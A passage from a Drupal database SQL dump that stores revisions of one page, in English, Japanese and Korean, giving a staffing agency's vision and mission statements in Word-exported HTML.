('page', 0, 25, 176, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 176, 'ko', 0, '<p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\"><strong>,&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:#4472C4;font-size:14.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:#4472C4;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:accent1;\" lang=\"KO\"><strong>위해</strong></span><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 178, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 178, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 178, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">국제 푶준 회사로서</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">해외</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">취업</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">기회를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">발굴하는</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">것입니다</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\">.</span><o:p></o:p></p><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\">&nbsp;</p><blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>미션</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoListParagraph\">&nbsp;</p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>대행사와</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>고객</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>간의</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>상호</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>존중</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>정직</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>,&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>신뢰로</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>오래</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>지속되는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>관계를</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>구축하기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>다른 대행사에 비하면 고객들이</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>선호하는</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>리딩</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>에이전시 되기</strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong>위해</strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\"><strong>.</strong></span><o:p></o:p><o:p></o:p><o:p></o:p><o:p></o:p></p>', '', 'full_html'),
('page', 0, 25, 196, 'en', 0, '<blockquote><h3><strong>Our Vision&nbsp;</strong></h3></blockquote><p class=\"MsoNormal\" style=\"tab-stops:194.95pt;\"><span style=\"font-size:12.0pt;line-height:107%;\">The aim is to train the best local human resources and develop overseas employment opportunities as an International quality company.</span><o:p></o:p></p><h3>&nbsp;</h3><blockquote><h3><strong>Our Mission&nbsp;</strong></h3></blockquote><p>To create lasting relationships with our clients and candidates based on honesty, integrity, trust and mutual respect. To be the leading partner that clients and candidates always choose to connect with.</p>', '', 'full_html'),
('page', 0, 25, 196, 'ja', 0, '<blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>目標</u></strong></span></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-language:JA;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\" lang=\"JA\">能力の高い生徒達を生み出し、国際スタンダードに負けない会社を運営して参ります。</span><o:p></o:p></p><blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:14.0pt;line-height:107%;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\"><strong><u>ミッション</u></strong></span><o:p></o:p></p></blockquote><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">会社とお客様の間でお互いに尊敬、正直さ、信用性などで永遠なる交流を蓄積してまいります。</span><o:p></o:p><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;mso-ascii-font-family:Calibri;mso-ascii-theme-font:minor-latin;mso-fareast-theme-font:minor-fareast;mso-hansi-font-family:Calibri;mso-hansi-theme-font:minor-latin;\">選ばれる順番のトップに立つ会社になる事。</span><o:p></o:p></p>', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('page', 0, 25, 196, 'ko', 0, '<blockquote><p class=\"MsoNormal\" style=\"tab-stops:350.7pt;\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>우리의</u></strong></span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>&nbsp;</u></strong></span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\"><strong><u>비젼</u></strong></span><o:p></o:p></p><p class=\"MsoNormal\">&nbsp;</p></blockquote><p class=\"MsoNormal\"><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">목표는 최고의</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">인재를</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span style=\"color:black;font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">양성하고</span><span style=\"color:black;font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-themecolor:text1;\" lang=\"KO\">&nbsp;</span><span 